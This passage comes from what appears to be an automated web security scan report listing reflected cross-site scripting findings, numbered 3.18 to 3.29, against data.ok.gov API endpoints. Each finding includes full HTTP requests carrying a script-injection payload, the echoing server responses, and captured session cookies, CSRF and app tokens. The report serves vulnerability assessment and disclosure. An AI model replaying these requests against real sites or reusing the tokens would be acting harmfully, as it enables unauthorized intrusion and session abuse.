Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:21:40 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/views86e9c<script>alert(1)</script>bfeb2fe5933/xxvf-kunf/snapshots/page"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 154

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/views86e9c<script>alert(1)</script>bfeb2fe5933/xxvf-kunf/snapshots/page\""
}

3.18. http://data.ok.gov/api/views/xxvf-kunf/snapshots/page [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /api/views/xxvf-kunf/snapshots/page

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7d0d3<script>alert(1)</script>29504336c09 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/views/xxvf-kunf7d0d3<script>alert(1)</script>29504336c09/snapshots/page?size=thumb HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:21:41 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/views/xxvf-kunf7d0d3<script>alert(1)</script>29504336c09/snapshots/page"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 154

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/views/xxvf-kunf7d0d3<script>alert(1)</script>29504336c09/snapshots/page\""
}

3.19. http://data.ok.gov/api/views/xxvf-kunf/snapshots/page [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /api/views/xxvf-kunf/snapshots/page

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ae8bc<script>alert(1)</script>2a2deed4792 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/views/xxvf-kunf/snapshotsae8bc<script>alert(1)</script>2a2deed4792/page?size=thumb HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:21:42 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/views/xxvf-kunf/snapshotsae8bc<script>alert(1)</script>2a2deed4792/page"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 154

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/views/xxvf-kunf/snapshotsae8bc<script>alert(1)</script>2a2deed4792/page\""
}

3.20. http://data.ok.gov/api/views/xxvf-kunf/snapshots/page [size parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /api/views/xxvf-kunf/snapshots/page

Issue detail

The value of the size request parameter is copied into the HTML document as plain text between tags. The payload a2723<script>alert(1)</script>42d84a967a3 was submitted in the size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/views/xxvf-kunf/snapshots/page?size=thumba2723<script>alert(1)</script>42d84a967a3 HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:21:38 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No snapshot at size thumba2723<script>alert(1)</script>42d84a967a3
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 129

{
"code" : "not_found",
"error" : true,
"message" : "No snapshot at size thumba2723<script>alert(1)</script>42d84a967a3"
}

3.21. http://data.ok.gov/views.json [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /views.json

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2d195<script>alert(1)</script>d4691d85556 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /views.json2d195<script>alert(1)</script>d4691d85556?accessType=WEBSITE&_=1304162592421&method=getCountForTableId&tableId=220869 HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
X-CSRF-Token: iR+NktWzrQ/EwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk=
X-Requested-With: XMLHttpRequest
X-App-Token: U29jcmF0YS0td2VraWNrYXNz0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.2.10.1304162509; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:23:01 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/views.json2d195<script>alert(1)</script>d4691d85556"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 134

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/views.json2d195<script>alert(1)</script>d4691d85556\""
}

3.22. http://data.ok.gov/views.json [tableId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /views.json

Issue detail

The value of the tableId request parameter is copied into the HTML document as plain text between tags. The payload e68f4<script>alert(1)</script>72f6a33362c was submitted in the tableId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /views.json?accessType=WEBSITE&_=1304162592421&method=getCountForTableId&tableId=220869e68f4<script>alert(1)</script>72f6a33362c HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
X-CSRF-Token: iR+NktWzrQ/EwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk=
X-Requested-With: XMLHttpRequest
X-App-Token: U29jcmF0YS0td2VraWNrYXNz0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.2.10.1304162509; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D

Response

HTTP/1.1 400 Bad Request
Date: Sat, 30 Apr 2011 11:22:59 GMT
Server: Apache
X-Error-Code: invalid_request
X-Error-Message: Invalid Input: '220869e68f4<script>alert(1)</script>72f6a33362c'
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 133

{
"code" : "invalid_request",
"error" : true,
"message" : "Invalid Input: '220869e68f4<script>alert(1)</script>72f6a33362c'"
}

3.23. http://data.ok.gov/views/INLINE/rows.json [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /views/INLINE/rows.json

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload adb9b<script>alert(1)</script>396285aefbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /viewsadb9b<script>alert(1)</script>396285aefbf/INLINE/rows.json?accessType=WEBSITE&method=getByIds&start=0&length=100&meta=true HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
Origin: http://data.ok.gov
X-CSRF-Token: iR+NktWzrQ/EwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk=
X-Requested-With: XMLHttpRequest
X-App-Token: U29jcmF0YS0td2VraWNrYXNz0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.3.9.1304162592440
Content-Length: 3125

{"id":"dz4w-xbzm","name":"Oklahoma Ignition Interlock Service Centers Map","attribution":"Oklahoma Board of Tests for Alcohol and Drug Influence","attributionLink":"http://www.ok.gov/bot","category":"
...[SNIP]...

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:23:21 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/viewsadb9b<script>alert(1)</script>396285aefbf/INLINE/rows.json"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 146

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/viewsadb9b<script>alert(1)</script>396285aefbf/INLINE/rows.json\""
}

3.24. http://data.ok.gov/views/INLINE/rows.json [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /views/INLINE/rows.json

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bd835<script>alert(1)</script>6cc009600c2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /views/INLINEbd835<script>alert(1)</script>6cc009600c2/rows.json?accessType=WEBSITE&method=getByIds&start=0&length=100&meta=true HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
Origin: http://data.ok.gov
X-CSRF-Token: iR+NktWzrQ/EwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk=
X-Requested-With: XMLHttpRequest
X-App-Token: U29jcmF0YS0td2VraWNrYXNz0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.3.9.1304162592440
Content-Length: 3125

{"id":"dz4w-xbzm","name":"Oklahoma Ignition Interlock Service Centers Map","attribution":"Oklahoma Board of Tests for Alcohol and Drug Influence","attributionLink":"http://www.ok.gov/bot","category":"
...[SNIP]...

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:23:23 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/views/INLINEbd835<script>alert(1)</script>6cc009600c2/rows.json"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 146

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/views/INLINEbd835<script>alert(1)</script>6cc009600c2/rows.json\""
}

3.25. http://data.ok.gov/views/INLINE/rows.json [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /views/INLINE/rows.json

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 59df6<script>alert(1)</script>13a82cfdea4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /views/INLINE/rows.json59df6<script>alert(1)</script>13a82cfdea4?accessType=WEBSITE&method=getByIds&start=0&length=100&meta=true HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
Origin: http://data.ok.gov
X-CSRF-Token: iR+NktWzrQ/EwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk=
X-Requested-With: XMLHttpRequest
X-App-Token: U29jcmF0YS0td2VraWNrYXNz0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.3.9.1304162592440
Content-Length: 3125

{"id":"dz4w-xbzm","name":"Oklahoma Ignition Interlock Service Centers Map","attribution":"Oklahoma Board of Tests for Alcohol and Drug Influence","attributionLink":"http://www.ok.gov/bot","category":"
...[SNIP]...

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:23:25 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/views/INLINE/rows.json59df6<script>alert(1)</script>13a82cfdea4"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 146

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/views/INLINE/rows.json59df6<script>alert(1)</script>13a82cfdea4\""
}

3.26. http://data.ok.gov/views/INLINE/rows.json [accessType parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /views/INLINE/rows.json

Issue detail

The value of the accessType request parameter is copied into the HTML document as plain text between tags. The payload 569be<script>alert(1)</script>05d4894cf0c was submitted in the accessType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /views/INLINE/rows.json?accessType=WEBSITE569be<script>alert(1)</script>05d4894cf0c&method=getByIds&start=0&length=100&meta=true HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
Origin: http://data.ok.gov
X-CSRF-Token: iR+NktWzrQ/EwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk=
X-Requested-With: XMLHttpRequest
X-App-Token: U29jcmF0YS0td2VraWNrYXNz0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.3.9.1304162592440
Content-Length: 3125

{"id":"dz4w-xbzm","name":"Oklahoma Ignition Interlock Service Centers Map","attribution":"Oklahoma Board of Tests for Alcohol and Drug Influence","attributionLink":"http://www.ok.gov/bot","category":"
...[SNIP]...

Response

HTTP/1.1 400 Bad Request
Date: Sat, 30 Apr 2011 11:23:16 GMT
Server: Apache
X-Error-Code: invalid_request
X-Error-Message: Invalid Input: 'WEBSITE569be<script>alert(1)</script>05d4894cf0c'
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 134

{
"code" : "invalid_request",
"error" : true,
"message" : "Invalid Input: 'WEBSITE569be<script>alert(1)</script>05d4894cf0c'"
}

3.27. http://data.ok.gov/views/INLINE/rows.json [length parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /views/INLINE/rows.json

Issue detail

The value of the length request parameter is copied into the HTML document as plain text between tags. The payload 2dc0c<script>alert(1)</script>06e805adce1 was submitted in the length parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /views/INLINE/rows.json?accessType=WEBSITE&method=getByIds&start=0&length=1002dc0c<script>alert(1)</script>06e805adce1&meta=true HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
Origin: http://data.ok.gov
X-CSRF-Token: iR+NktWzrQ/EwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk=
X-Requested-With: XMLHttpRequest
X-App-Token: U29jcmF0YS0td2VraWNrYXNz0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.3.9.1304162592440
Content-Length: 3125

{"id":"dz4w-xbzm","name":"Oklahoma Ignition Interlock Service Centers Map","attribution":"Oklahoma Board of Tests for Alcohol and Drug Influence","attributionLink":"http://www.ok.gov/bot","category":"
...[SNIP]...

Response

HTTP/1.1 400 Bad Request
Date: Sat, 30 Apr 2011 11:23:20 GMT
Server: Apache
X-Error-Code: invalid_request
X-Error-Message: Invalid Input: '1002dc0c<script>alert(1)</script>06e805adce1'
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 130

{
"code" : "invalid_request",
"error" : true,
"message" : "Invalid Input: '1002dc0c<script>alert(1)</script>06e805adce1'"
}

3.28. http://data.ok.gov/views/INLINE/rows.json [start parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /views/INLINE/rows.json

Issue detail

The value of the start request parameter is copied into the HTML document as plain text between tags. The payload c08d2<script>alert(1)</script>ce23890d211 was submitted in the start parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /views/INLINE/rows.json?accessType=WEBSITE&method=getByIds&start=0c08d2<script>alert(1)</script>ce23890d211&length=100&meta=true HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
Origin: http://data.ok.gov
X-CSRF-Token: iR+NktWzrQ/EwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk=
X-Requested-With: XMLHttpRequest
X-App-Token: U29jcmF0YS0td2VraWNrYXNz0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.3.9.1304162592440
Content-Length: 3125

{"id":"dz4w-xbzm","name":"Oklahoma Ignition Interlock Service Centers Map","attribution":"Oklahoma Board of Tests for Alcohol and Drug Influence","attributionLink":"http://www.ok.gov/bot","category":"
...[SNIP]...

Response

HTTP/1.1 400 Bad Request
Date: Sat, 30 Apr 2011 11:23:18 GMT
Server: Apache
X-Error-Code: invalid_request
X-Error-Message: Invalid Input: '0c08d2<script>alert(1)</script>ce23890d211'
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 128

{
"code" : "invalid_request",
"error" : true,
"message" : "Invalid Input: '0c08d2<script>alert(1)</script>ce23890d211'"
}

3.29. http://data.ok.gov/views/dz4w-xbzm.json [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /views/dz4w-xbzm.json

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47fae<script>alert(1)</script>4549fe22511 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /views47fae<script>alert(1)</script>4549fe22511/dz4w-xbzm.json?accessType=WEBSITE&method=getDefaultView&_=1304162592421 HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
X-CSRF-Token: iR+NktWzrQ/EwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk=
X-Requested-With: XMLHttpRequest
X-App-Token: U29jcmF0YS0td2VraWNrYXNz0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
